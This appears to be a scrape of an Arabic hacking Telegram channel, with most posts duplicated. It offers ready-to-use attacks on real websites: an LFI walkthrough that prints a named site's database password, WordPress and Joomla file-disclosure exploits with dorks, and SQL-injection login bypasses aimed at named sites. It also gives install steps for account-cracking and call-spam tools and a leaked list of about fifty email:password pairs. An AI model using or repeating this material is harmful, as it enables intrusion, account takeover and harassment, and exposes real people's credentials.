ثغرة Local File Include
بسم الله الرحمن الرحيم
اخواني الكرام
السلام عليكم و رحمة الله وبركاته
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
اولا لدينا الموقع المستهدف:http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=index
طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/تمام
او بإمكانك فك التشفير عن طريق الشيل !!!
والمراد من فك التشفير هو الحصول على ملف الكونيفق
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=config_inc
الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom
#CS
بسم الله الرحمن الرحيم
اخواني الكرام
السلام عليكم و رحمة الله وبركاته
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
اولا لدينا الموقع المستهدف:http://theatrefoxcompagnie.com/index.php?page= هذا هو الموقع
نكتب هذا الكود بعد الرابط مباشرة
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=index
طبعا هو ليس كود إنما فلتر المهم بعد هذا الكود يطلع لنا كلام بالانجليزي.!!!
الان ننسخ هذا الكلام و ننتقل لهذا الموقع لفك التشفير ... http://home.paulschou.net/tools/xlate/تمام
او بإمكانك فك التشفير عن طريق الشيل !!!
والمراد من فك التشفير هو الحصول على ملف الكونيفق
بعد فك التشفير نأخذ هذه الكلمة config_inc تمام
وننسخها ونحذف كلمة index في الكود السابق ونضع هذه الكلمة config_inc رائع يعني بصير الكود
كود PHP: [عرض]
php://filter/convert.base64-encode/resource=config_inc
الان نرى كلام انجليزي نقوم بنسخه و بفك تشفيره إما عبر الشيل او عبر الموقع حسب الرغبة
وبعد فك التشفير نجد المعلومات كالتالي
user:foxcompagnie
Password:b9waz95d
database:theatrefoxcompagniecom
#CS
السلام عليكم ورحمة الله وبركاته
اليوم راح اعلمكم 6 أنواع من التشفير و كيفيه فكها
1- التشفير الأول يسمي ASCII
- تشفير أسكي ASCII وهي إختصار لـ (American Standard Code for Information Interchange )
هي مجموعة رموز ونظام ترميز مبني على الابجدية اللاتينية بالشكل الذي تستخدم به في الإنجليزية الحديثة ولغات غرب أوروبية أخرى. من أكثر الاستخدامات شيوعا للنصوص المكتوبة بالآسكي ,استخدامها في أنظمةالحاسوب، وفي أجهزة الاتصالات وأنظمة التحكم التي تتعامل مع نصوص.
يعرّف نظام ASCII القياسي الرموز القابلة للطباعة الآتية ، مرتبة حسب قيمة ASCII الخاصة بها
ويمكن استخدام تطبيق ASCII CONVERTER
2- التشفير الثاني يسمي BIN
3- التشفير الثالث يسمي HEX
ويمكن استخدام تطبيق ASCII CONVERTER
4- التشفير الرابع يسمي OCT
نفس الشي يستخدم تطبيق ويمكن استخدام تطبيق ASCII CONVERTER
ويمكن استخدام تطبيق ASCII CONVERTER
5- التشفير الخامس يسمي based64
الأساس 64 طريقة ترميز لتحويل ترميز أسكي للحروف إلى ترميز على أساس 64 ثم استخدام الحرف المقابل له في ترميز 64 [انظر جدول 1 في الأسفل ]
يستخدم الترميز بالأساس 64 عندما تكون هناك حاجةلترميز البيانات الثنائية المنقولة والممثلة لبيانات نصية، من أجل التأكد أن البيانات لا تزال سليمة بعد عملية النقل.
هناك العديد من التطبيقات التي تستخدم الترميز بالأساس 64 مثل البريد الإلكتروني باستخدام معيار الإنترنتMIME وكذلك في تخزين البيانات المعقدة في الإكس إم إل
يتم استخدام هذا الرابط لتشفير و فك التشفير
http://www.convertstring.com/ar/EncodeDecode/Base64Decode
أو استخدام تطبيق ASCII CONVERTER
6- التشفير السادس يسمي MD5
خوارزمية أم دي 5 أو خوارزمية هضم الرسالة الخامسة(بالإنجليزية: Message Digest MD5 algorithm) هي دالة الاختزال المسمّاة دالة هاش تشفيرية (Message Digest) والتي تُعتبر من أكثر دوال الاختزال انتشارًا في علم التشفير وأمن المعلومات نظرًا لسهولة تنفيذها وصعوبة اختراقها. يشمل ذلك نظرة سريعة على أهميّتها، طريقة تطويرها من النظريّة التي تتّبعها ومُخرجاتها، والنسخ السابقة لها إم دي2, إم دي4 المطوّرة في مختبرات إم آي تي MIT عن طريق الدكتور رونالد ريفست. يُفرّق أيضًا بين MD5 وبقيّة دوال الاختزال عن طريق أبرز خصائصها التقنيّة ومميّزاتها، ثُم يوضّح بشيءٍ من التفصيل خطوات تنفيذها بدءًا من طريقة الاختزال، مرورًا بالجولات الأربع انتهاءً باختزال الرسالة الأصليّة إلى شكلها النهائيّ. وأخيرًا يُلقي هذا المقال نظرة سريعة على عيوب ونقاط ضعف هذه الدالّة نسبةً إلى ثباتها أمام محاولات الاختراق، وسلسلة محاولات الكسر الناجحة التي حصلت عليها مُنذ بداية تطويرها.
و الموقع المستخدم لتشفير و فك تشفيرها هو
http://ar.freemd5.com/
#CS
اليوم راح اعلمكم 6 أنواع من التشفير و كيفيه فكها
1- التشفير الأول يسمي ASCII
- تشفير أسكي ASCII وهي إختصار لـ (American Standard Code for Information Interchange )
هي مجموعة رموز ونظام ترميز مبني على الابجدية اللاتينية بالشكل الذي تستخدم به في الإنجليزية الحديثة ولغات غرب أوروبية أخرى. من أكثر الاستخدامات شيوعا للنصوص المكتوبة بالآسكي ,استخدامها في أنظمةالحاسوب، وفي أجهزة الاتصالات وأنظمة التحكم التي تتعامل مع نصوص.
يعرّف نظام ASCII القياسي الرموز القابلة للطباعة الآتية ، مرتبة حسب قيمة ASCII الخاصة بها
ويمكن استخدام تطبيق ASCII CONVERTER
2- التشفير الثاني يسمي BIN
3- التشفير الثالث يسمي HEX
ويمكن استخدام تطبيق ASCII CONVERTER
4- التشفير الرابع يسمي OCT
نفس الشي يستخدم تطبيق ويمكن استخدام تطبيق ASCII CONVERTER
ويمكن استخدام تطبيق ASCII CONVERTER
5- التشفير الخامس يسمي based64
الأساس 64 طريقة ترميز لتحويل ترميز أسكي للحروف إلى ترميز على أساس 64 ثم استخدام الحرف المقابل له في ترميز 64 [انظر جدول 1 في الأسفل ]
يستخدم الترميز بالأساس 64 عندما تكون هناك حاجةلترميز البيانات الثنائية المنقولة والممثلة لبيانات نصية، من أجل التأكد أن البيانات لا تزال سليمة بعد عملية النقل.
هناك العديد من التطبيقات التي تستخدم الترميز بالأساس 64 مثل البريد الإلكتروني باستخدام معيار الإنترنتMIME وكذلك في تخزين البيانات المعقدة في الإكس إم إل
يتم استخدام هذا الرابط لتشفير و فك التشفير
http://www.convertstring.com/ar/EncodeDecode/Base64Decode
أو استخدام تطبيق ASCII CONVERTER
6- التشفير السادس يسمي MD5
خوارزمية أم دي 5 أو خوارزمية هضم الرسالة الخامسة(بالإنجليزية: Message Digest MD5 algorithm) هي دالة الاختزال المسمّاة دالة هاش تشفيرية (Message Digest) والتي تُعتبر من أكثر دوال الاختزال انتشارًا في علم التشفير وأمن المعلومات نظرًا لسهولة تنفيذها وصعوبة اختراقها. يشمل ذلك نظرة سريعة على أهميّتها، طريقة تطويرها من النظريّة التي تتّبعها ومُخرجاتها، والنسخ السابقة لها إم دي2, إم دي4 المطوّرة في مختبرات إم آي تي MIT عن طريق الدكتور رونالد ريفست. يُفرّق أيضًا بين MD5 وبقيّة دوال الاختزال عن طريق أبرز خصائصها التقنيّة ومميّزاتها، ثُم يوضّح بشيءٍ من التفصيل خطوات تنفيذها بدءًا من طريقة الاختزال، مرورًا بالجولات الأربع انتهاءً باختزال الرسالة الأصليّة إلى شكلها النهائيّ. وأخيرًا يُلقي هذا المقال نظرة سريعة على عيوب ونقاط ضعف هذه الدالّة نسبةً إلى ثباتها أمام محاولات الاختراق، وسلسلة محاولات الكسر الناجحة التي حصلت عليها مُنذ بداية تطويرها.
و الموقع المستخدم لتشفير و فك تشفيرها هو
http://ar.freemd5.com/
#CS
Convertstring
base64 في فك شفرة - اون لاين base64 في فك الرموز
base64 في فك شفرة. أداة على الانترنت لbase64 في فك سلسلة. تحويل النص base64 ترميز إلى سلسلة فك الشفرة أو تحميل كملف ثنائي استخدام هذا مجانية على الانترنت أداة فك base64 في. base64 في إلى نص. base64 في لملف التحميل.
##################################################
# Exploit Title: Wordpress woocommerce product options Upload Shell
# Google Dork :
# N/A
# Date: 16/05/2019
# Exploit Author: ArkealoGeNDz
# Tested on: Kali linux 2.0 / Mozilla Firefox
# Vulnerability : http://www.website.dz//woocommerce-product-options/includes/image-upload.php
# Use Burp Suite To Upload Shell
# Path Shell : /wp-content/plugins/woocommerce-product-options/uploads/numbers-letters/shell.php
# Path Shell 2 : /wp-content/uploads/2019/05/shell.php
##################################################
# Demo:
# https://www.pestamps.com/wp-content/plugins/woocommerce-product-options/uploads/3f59b09a5a/ArkealoGeNDz.png
# https://www.numerim.bzh/wp-content/plugins/woocommerce-product-options/uploads/92c7372df6/ArkealoGeNDz.png
# https://lvrparis.fr/wp-content/plugins/woocommerce-product-options/uploads/49dde56d2f/ArkealoGeNDz.png
# https://designmummy.com.au/wp-content/plugins/woocommerce-product-options/uploads/4a5eb89316/ArkealoGeNDz.png
#################################################
# Telegram: @ArkealoGeNDz
#################################################
# Exploit Title: Wordpress woocommerce product options Upload Shell
# Google Dork :
# N/A
# Date: 16/05/2019
# Exploit Author: ArkealoGeNDz
# Tested on: Kali linux 2.0 / Mozilla Firefox
# Vulnerability : http://www.website.dz//woocommerce-product-options/includes/image-upload.php
# Use Burp Suite To Upload Shell
# Path Shell : /wp-content/plugins/woocommerce-product-options/uploads/numbers-letters/shell.php
# Path Shell 2 : /wp-content/uploads/2019/05/shell.php
##################################################
# Demo:
# https://www.pestamps.com/wp-content/plugins/woocommerce-product-options/uploads/3f59b09a5a/ArkealoGeNDz.png
# https://www.numerim.bzh/wp-content/plugins/woocommerce-product-options/uploads/92c7372df6/ArkealoGeNDz.png
# https://lvrparis.fr/wp-content/plugins/woocommerce-product-options/uploads/49dde56d2f/ArkealoGeNDz.png
# https://designmummy.com.au/wp-content/plugins/woocommerce-product-options/uploads/4a5eb89316/ArkealoGeNDz.png
#################################################
# Telegram: @ArkealoGeNDz
#################################################
السلام عليكم ورحمة الله وبركاته
صار لي فترة مانشرت شي
شرح بسيط و حلو
في أشخاص فضوليه مثلي إذا حد ارسل لها رابط تفتحه علي طول لمعرفه ما بداخل هذا الرابط
جلبت لكم طريقه رائعه لمعرفه مابداخل الرابط من غير ما تفتح الرابط اصلا و هي عن طريق بوت @URL2IMGBot
وظيفه هذا البوت تصوير ما بداخل هذا الرابط
كل ما عليك الضغط علي start
و بعدها تعطيه اي رابط بدك تعرف ما بداخله راح يعطيك صورة فيها استكشاف للرابط
مثلا انا راح انسخ هذا الرابط و اضعه بالبوت
https://www.cobaltstrike.com
راح استني شوي راح يعطيني صورة بها الموقع
#CS
صار لي فترة مانشرت شي
شرح بسيط و حلو
في أشخاص فضوليه مثلي إذا حد ارسل لها رابط تفتحه علي طول لمعرفه ما بداخل هذا الرابط
جلبت لكم طريقه رائعه لمعرفه مابداخل الرابط من غير ما تفتح الرابط اصلا و هي عن طريق بوت @URL2IMGBot
وظيفه هذا البوت تصوير ما بداخل هذا الرابط
كل ما عليك الضغط علي start
و بعدها تعطيه اي رابط بدك تعرف ما بداخله راح يعطيك صورة فيها استكشاف للرابط
مثلا انا راح انسخ هذا الرابط و اضعه بالبوت
https://www.cobaltstrike.com
راح استني شوي راح يعطيني صورة بها الموقع
#CS
Cobalt Strike
Cobalt Strike | Adversary Simulation and Red Team Operations
Cobalt Strike is an adversary simulation tool that can emulate the tactics and techniques of a quiet long-term embedded threat actor in an IT network using Beacon, a post-exploitation agent and covert channels.
ثغرة wptf-image-gallery 1.0.3 - Remote File Download
الاستغلال
./wptf-image-gallery/lib-mbox/ajax_load.php
شرح
http://www.site.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
#CS
الاستغلال
./wptf-image-gallery/lib-mbox/ajax_load.php
شرح
http://www.site.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
#CS
الثغرة
Local File Disclosure in wordpress theme Diarise
الدورك
inurl:"wp-content/themes/diarise/"
الاستغلال
http://site.com/wp-content/themes/diarise/download.php?calendar=[ file:///etc/passwd ]
#CS
Local File Disclosure in wordpress theme Diarise
الدورك
inurl:"wp-content/themes/diarise/"
الاستغلال
http://site.com/wp-content/themes/diarise/download.php?calendar=[ file:///etc/passwd ]
#CS
الدورك intext:"ISPROJEK"
بعدها العثور علي لوحه التحكم
راح يكون اليوزر و الباس تبعهم
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+
الثاني
الدورك
filename:”wp-config.php” “define(‘DB_PASSWORD’,” extension:php
الدورك
inurl:"index.php?mnu=login"
الاستخدام
/ index.php?mnu=admin
الدورك
intext:"Powered by iyiWebSitesi"
الاستخدام
لوحه التحكم
testpage.com/admin
sql bypass
id : = ' /*!or*/1=1#
pass : = ' /*!or*/1=1#
#cs
بعدها العثور علي لوحه التحكم
راح يكون اليوزر و الباس تبعهم
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+
الثاني
الدورك
filename:”wp-config.php” “define(‘DB_PASSWORD’,” extension:php
الدورك
inurl:"index.php?mnu=login"
الاستخدام
/ index.php?mnu=admin
الدورك
intext:"Powered by iyiWebSitesi"
الاستخدام
لوحه التحكم
testpage.com/admin
sql bypass
id : = ' /*!or*/1=1#
pass : = ' /*!or*/1=1#
#cs
ثغرة PHPMiniAdmin 1.9 Database Open No-Secure Exploit
الدورك
inurl:phpminiadmin.php
الاستغلال
https://site.com/salon/db/phpminiadmin.php
#CS
الدورك
inurl:phpminiadmin.php
الاستغلال
https://site.com/salon/db/phpminiadmin.php
#CS
ثغرة ال
Joomla RSFirewall Components 2.11.25 Database and Password Disclosure
الدورك
inurl:''/index.php?option=com_rsfirewall''
أو
inurl:''/administrator/components/com_rsfirewall/'' intext:Hosted & Designed By Suryanandan.net
أو
intext:Designed by Artilabio
الاستغلال
ممكن نسحب اللسته تبع الباسورد
/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt
أو الوصول لقاعدة البيانات
/administrator/components/com_rsfirewall/sql/mysql/configuration.data.sql
/administrator/components/com_rsfirewall/sql/mysql/configuration.sql
/administrator/components/com_rsfirewall/sql/mysql/exceptions.sql
/administrator/components/com_rsfirewall/sql/mysql/feeds.data.sql
/administrator/components/com_rsfirewall/
وغيرها من القواعد
مثال
www.ippbm.gov.my/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt
#CS
Joomla RSFirewall Components 2.11.25 Database and Password Disclosure
الدورك
inurl:''/index.php?option=com_rsfirewall''
أو
inurl:''/administrator/components/com_rsfirewall/'' intext:Hosted & Designed By Suryanandan.net
أو
intext:Designed by Artilabio
الاستغلال
ممكن نسحب اللسته تبع الباسورد
/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt
أو الوصول لقاعدة البيانات
/administrator/components/com_rsfirewall/sql/mysql/configuration.data.sql
/administrator/components/com_rsfirewall/sql/mysql/configuration.sql
/administrator/components/com_rsfirewall/sql/mysql/exceptions.sql
/administrator/components/com_rsfirewall/sql/mysql/feeds.data.sql
/administrator/components/com_rsfirewall/
وغيرها من القواعد
مثال
www.ippbm.gov.my/administrator/components/com_rsfirewall/assets/dictionary/passwords.txt
#CS
السلام عليكم ورحمة الله وبركاته
شرقي اليوم كيفيه تكريك حسابات سبوتيفاي+فيسبوك+upaly+madiafire+fortnight+hule
سهل جداا
سنتحتاج الي اداتين هما
الاتشكر والكومبو البريفيت
اولا قم بفتح termux
اولا علينا تثبيت أداة الكومبو وظيفتها استخراج كومبو من التيرمكس
اوامرها
pkg install php git -y
git clone https://github.com/Juni0r007/PasTerm.git
cd PasTerm
chmod +x *
php pasterm.php
راح تفتح معك الأداة
و بعدها
راح يطلب لك تكتب key word راح تنسخ
الموجود بالأسفل و تلصقه علي termux
@gmail.com,@yahoo.com,@hotmail.com,@aol.com.@hotmail.co.uk,@hotmail.fr,@msn.com,@yahoo.fr,@wanadoo.fr,@orange.fr,@comcast.net,@yahoo.co.uk,@yahoo.com.br,@yahoo.co.in,@live.com
و بعدها راح يقول لك اكتب اسم لهذة اللسته
انا كتبت saja
و بعدها راح يطلع لك مسار التم الاحتفاظ به
مثل هذا
/data/data/com.termux/files/home/saja.txt
كذا انتهينا من الأداة الاولي و تم استخراج للسته
قويه من والكومبو
راح بندا الجزء الثاني و هو تثبيت اداة اتشكر الاكونتات
نفتح صفحه جديدة و نكتب الأوامر التاليه
1- rm -rif PasTerm
apt update&&apt upgrade -y
2-termux-setup-storage
3- pkg install php git -y
4- git clone https://github.com/Juni0r007/AIOChk.git
5- ls
6- cd AIOChk
7- chmod +x *
8- php aio.php
و بعدها راح تشتغل الأداة
و راح نختار الرقم واحد
راح يطلب منك المساء الموجود به كومبو راح تكتب المسار الاعطتك ياه الأداة السابقه مثل هذا
/data/data/com.termux/files/home/saja.txt
و بعدها راح يطلع لك مجموعه من الايميلات مع الباسورد تبعها
استمتعوووو
(شباب الشرح دا انا بريئه منكم لو في حد استخدمه بطريقه سيئه)
#CS
شرقي اليوم كيفيه تكريك حسابات سبوتيفاي+فيسبوك+upaly+madiafire+fortnight+hule
سهل جداا
سنتحتاج الي اداتين هما
الاتشكر والكومبو البريفيت
اولا قم بفتح termux
اولا علينا تثبيت أداة الكومبو وظيفتها استخراج كومبو من التيرمكس
اوامرها
pkg install php git -y
git clone https://github.com/Juni0r007/PasTerm.git
cd PasTerm
chmod +x *
php pasterm.php
راح تفتح معك الأداة
و بعدها
راح يطلب لك تكتب key word راح تنسخ
الموجود بالأسفل و تلصقه علي termux
@gmail.com,@yahoo.com,@hotmail.com,@aol.com.@hotmail.co.uk,@hotmail.fr,@msn.com,@yahoo.fr,@wanadoo.fr,@orange.fr,@comcast.net,@yahoo.co.uk,@yahoo.com.br,@yahoo.co.in,@live.com
و بعدها راح يقول لك اكتب اسم لهذة اللسته
انا كتبت saja
و بعدها راح يطلع لك مسار التم الاحتفاظ به
مثل هذا
/data/data/com.termux/files/home/saja.txt
كذا انتهينا من الأداة الاولي و تم استخراج للسته
قويه من والكومبو
راح بندا الجزء الثاني و هو تثبيت اداة اتشكر الاكونتات
نفتح صفحه جديدة و نكتب الأوامر التاليه
1- rm -rif PasTerm
apt update&&apt upgrade -y
2-termux-setup-storage
3- pkg install php git -y
4- git clone https://github.com/Juni0r007/AIOChk.git
5- ls
6- cd AIOChk
7- chmod +x *
8- php aio.php
و بعدها راح تشتغل الأداة
و راح نختار الرقم واحد
راح يطلب منك المساء الموجود به كومبو راح تكتب المسار الاعطتك ياه الأداة السابقه مثل هذا
/data/data/com.termux/files/home/saja.txt
و بعدها راح يطلع لك مجموعه من الايميلات مع الباسورد تبعها
استمتعوووو
(شباب الشرح دا انا بريئه منكم لو في حد استخدمه بطريقه سيئه)
#CS
GitHub
GitHub - Juni0r007/PasTerm: Genera combos a base de Keywords con Termux
Genera combos a base de Keywords con Termux. Contribute to Juni0r007/PasTerm development by creating an account on GitHub.
mitsu1975@msn.com:Subaru1975
ilrante36@gmail.com:pashok007
Ayoub77127@gmail.com:aqwzsx77
NiceEmka@mail.ru:cegth5648
florentpetit58@outlook.fr:florent58
waprol71@gmail.com:123456qwe
rene.kaur8@gmail.com:Kanakonn32
diego_mzmn@hotmail.com:Ikariam98
gooders@live.co.uk:Marine11
felix.lorente.7@gmail.com:mojopicon7
Dustin@ykc.com:Berkman1
kosmaladamian@gmail.com:K1o2s3m4
arseniy8808@gmail.com:Bonna8808
aaboywow@hotmail.com:Michelaar9
jessethemexi3@yahoo.com:Kicker123
samsch2003@hotmail.com:samsch23
singersys@yahoo.com:roxburyys01
kaczorm321@gmail.com:Artemis761
ilkerzeno@hotmail.de:Autobot1
ayoubyahia14@gmail.com:amine2007
taipari2017@gmail.com:motorbike8
dique95@mail.ru:qq080705
loganarch6@yahoo.com:TXdpry37
joseph.weaver2012@gmail.com:Ramen106
leonardosborges1998@hotmail.com:isotopo2
bashoreeric@gmail.com:kosmo08
trillolavin97@gmail.com:trillolavin97
bachnguyen@gmail.com:minolta1995
toniandhamish@hotmail.com:fashion108
bryanmontalvo11@gmail.com:nayeli09
sqeezrage@gmail.com:mathieu19
mikkel@ahls.dk:Mikkel2000
hiroki.job0423@gmail.com:hiroki0423
victorito919@gmail.com:octubre87
eruler39@gmail.com:E-Ruler39
flaviocoutinho.nave@gmail.com:tavares121
johnnywithnoh@gmail.com:N0thing.
ashleykaybeck@yahoo.com:socrazy1
rezplz_@hotmail.com:Kitkatz1
mr.juerling@gmail.com:Happy0ne
gamer1966@att.net:tacos4me
bg1995@web.de:zeroalfaxD1!
CHUVAKA622@gmail.com:Juancjc1
mockagemaster@googlemail.com:Excal1bur001
saroks80@mail.ru:071177ser
joaogoncaloribeiro@live.com.pt:Santana5
weslley.thomas25@gmail.com:w1e2s3l4
2nekitgames@gmail.com:nikita7224
necromaniatico66@gmail.com:Putoski123
renat1470@yandex.ru:qazwsxedc1470
giuseppepolese89@gmail.com:311089peppe
ieronman@gmail.com:Fox1337fox
lerjux@gmail.com:zubilinmike1285
#CS
ilrante36@gmail.com:pashok007
Ayoub77127@gmail.com:aqwzsx77
NiceEmka@mail.ru:cegth5648
florentpetit58@outlook.fr:florent58
waprol71@gmail.com:123456qwe
rene.kaur8@gmail.com:Kanakonn32
diego_mzmn@hotmail.com:Ikariam98
gooders@live.co.uk:Marine11
felix.lorente.7@gmail.com:mojopicon7
Dustin@ykc.com:Berkman1
kosmaladamian@gmail.com:K1o2s3m4
arseniy8808@gmail.com:Bonna8808
aaboywow@hotmail.com:Michelaar9
jessethemexi3@yahoo.com:Kicker123
samsch2003@hotmail.com:samsch23
singersys@yahoo.com:roxburyys01
kaczorm321@gmail.com:Artemis761
ilkerzeno@hotmail.de:Autobot1
ayoubyahia14@gmail.com:amine2007
taipari2017@gmail.com:motorbike8
dique95@mail.ru:qq080705
loganarch6@yahoo.com:TXdpry37
joseph.weaver2012@gmail.com:Ramen106
leonardosborges1998@hotmail.com:isotopo2
bashoreeric@gmail.com:kosmo08
trillolavin97@gmail.com:trillolavin97
bachnguyen@gmail.com:minolta1995
toniandhamish@hotmail.com:fashion108
bryanmontalvo11@gmail.com:nayeli09
sqeezrage@gmail.com:mathieu19
mikkel@ahls.dk:Mikkel2000
hiroki.job0423@gmail.com:hiroki0423
victorito919@gmail.com:octubre87
eruler39@gmail.com:E-Ruler39
flaviocoutinho.nave@gmail.com:tavares121
johnnywithnoh@gmail.com:N0thing.
ashleykaybeck@yahoo.com:socrazy1
rezplz_@hotmail.com:Kitkatz1
mr.juerling@gmail.com:Happy0ne
gamer1966@att.net:tacos4me
bg1995@web.de:zeroalfaxD1!
CHUVAKA622@gmail.com:Juancjc1
mockagemaster@googlemail.com:Excal1bur001
saroks80@mail.ru:071177ser
joaogoncaloribeiro@live.com.pt:Santana5
weslley.thomas25@gmail.com:w1e2s3l4
2nekitgames@gmail.com:nikita7224
necromaniatico66@gmail.com:Putoski123
renat1470@yandex.ru:qazwsxedc1470
giuseppepolese89@gmail.com:311089peppe
ieronman@gmail.com:Fox1337fox
lerjux@gmail.com:zubilinmike1285
#CS
# اسم الثغرة : Joomla com_admin Components from V2.5.4 to V3.7.4
Database Backup Arbitrary File Download Vulnerability
# الدورك
inurl:''/administrator/components/com_admin/sql/''
# نوع الثغرة متوسطة
#################################################################################################
# مسار لوحه التحكم :
/administrator
#################################################################################################
# الاستغلالات :
/joomla/administrator/components/com_admin/sql/others/mysql/......
/PATH/PATH/administrator/components/com_admin/sql/others/mysql/......
/PATH/administrator/components/com_admin/sql/updates/mysql/......
/administrator/components/com_admin/sql/updates/mysql/......
/administrator/components/com_admin/sql/updates/postgresql/.......
/administrator/components/com_admin/sql/updates/sqlazure/......
/administrator/components/com_admin/sql/updates/mysql/2.5.4-[YEAR]-[MONTH]-[DAY].sql
/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-18.sql
/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-19.sql
/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql
/administrator/components/com_admin/sql/updates/mysql/2.5.6.sql
/administrator/components/com_admin/sql/updates/mysql/2.5.7.sql
/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql
/PATH/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql
/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-[YEAR]-[MONTH]-[DAY].sql
/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-18.sql
/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-19.sql
/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql
/administrator/components/com_admin/sql/updates/sqlazure/2.5.6.sql
/administrator/components/com_admin/sql/updates/sqlazure/2.5.7.sql
/administrator/components/com_admin/sql/updates/mysql/2.5.[THIS-NUMBER-CHANGES-].sql
#################################################################################################
# أمثلة لمواقع مصابة =>
[+]
xpilot-ai.org/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql
[+]
#CS
Database Backup Arbitrary File Download Vulnerability
# الدورك
inurl:''/administrator/components/com_admin/sql/''
# نوع الثغرة متوسطة
#################################################################################################
# مسار لوحه التحكم :
/administrator
#################################################################################################
# الاستغلالات :
/joomla/administrator/components/com_admin/sql/others/mysql/......
/PATH/PATH/administrator/components/com_admin/sql/others/mysql/......
/PATH/administrator/components/com_admin/sql/updates/mysql/......
/administrator/components/com_admin/sql/updates/mysql/......
/administrator/components/com_admin/sql/updates/postgresql/.......
/administrator/components/com_admin/sql/updates/sqlazure/......
/administrator/components/com_admin/sql/updates/mysql/2.5.4-[YEAR]-[MONTH]-[DAY].sql
/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-18.sql
/administrator/components/com_admin/sql/updates/mysql/2.5.4-2012-03-19.sql
/administrator/components/com_admin/sql/updates/mysql/2.5.5.sql
/administrator/components/com_admin/sql/updates/mysql/2.5.6.sql
/administrator/components/com_admin/sql/updates/mysql/2.5.7.sql
/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql
/PATH/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql
/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-[YEAR]-[MONTH]-[DAY].sql
/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-18.sql
/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-19.sql
/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql
/administrator/components/com_admin/sql/updates/sqlazure/2.5.6.sql
/administrator/components/com_admin/sql/updates/sqlazure/2.5.7.sql
/administrator/components/com_admin/sql/updates/mysql/2.5.[THIS-NUMBER-CHANGES-].sql
#################################################################################################
# أمثلة لمواقع مصابة =>
[+]
xpilot-ai.org/administrator/components/com_admin/sql/updates/mysql/3.0.0.sql
[+]
#CS
Forwarded from Sudanese anonymous (السلطان 'ٰۗٛۧۙۙ)
Media is too big
VIEW IN TELEGRAM
الشرح عبارة عن
فيديو
النص رسلتو زمان🔥👍
بي مناسبة الناس قالت انو الأداة ما شغالة معاها حقت مكالمات المزعجة امسح ديك وثبت دي شغالة وهسي قبل ما ارسل المنشور دا ثبتها وجربتها شغال 100%
الشرح فيديو ونص مقدم من
#السلطان
@ayman5593
مساء الخير ساشرح لكم اليوم اداة جديده بلغه php
هذه الاداة تقوم بعمل spammer علي الهاتف يعني مثل الرسائل المزعجة لاكن اتصال وليس رسائل
طريقه التثبيت اكتب الاوامر في تيرموكس
pkg install git php - y
pkg install php
امر تنصيب الاداة
git clone https://github.com/siputra12/fakecall.git
امر فتح ملف الاداة
cd fakecall
امر اعطاء الصلاحيات للاداة
chmod +x call.php
فتح الاداه
php call.php
لاتنسو تشتركو في قناتي لمزيد من الشروحات الحصرية
https://www.youtube.com/channel/UCwOOyp6gotOz6sf6ilDTljw
فيديو
النص رسلتو زمان🔥👍
بي مناسبة الناس قالت انو الأداة ما شغالة معاها حقت مكالمات المزعجة امسح ديك وثبت دي شغالة وهسي قبل ما ارسل المنشور دا ثبتها وجربتها شغال 100%
الشرح فيديو ونص مقدم من
#السلطان
@ayman5593
مساء الخير ساشرح لكم اليوم اداة جديده بلغه php
هذه الاداة تقوم بعمل spammer علي الهاتف يعني مثل الرسائل المزعجة لاكن اتصال وليس رسائل
طريقه التثبيت اكتب الاوامر في تيرموكس
pkg install git php - y
pkg install php
امر تنصيب الاداة
git clone https://github.com/siputra12/fakecall.git
امر فتح ملف الاداة
cd fakecall
امر اعطاء الصلاحيات للاداة
chmod +x call.php
فتح الاداه
php call.php
لاتنسو تشتركو في قناتي لمزيد من الشروحات الحصرية
https://www.youtube.com/channel/UCwOOyp6gotOz6sf6ilDTljw
الاسم : SO-AT Solution CMS Bypass SQL Login
الدورك inurl:/coop/re_register.php
الاستغلال
/coop/adminlogon.php
User: ' or 1=1 limit 1 -- -+
Password: ' or 1=1 limit 1 -- -+
أمثلة
http://healthcoop.or.th/coop/adminlogon.php
http://www.tot-coop.com/coop/adminlogon.php
#CS
الدورك inurl:/coop/re_register.php
الاستغلال
/coop/adminlogon.php
User: ' or 1=1 limit 1 -- -+
Password: ' or 1=1 limit 1 -- -+
أمثلة
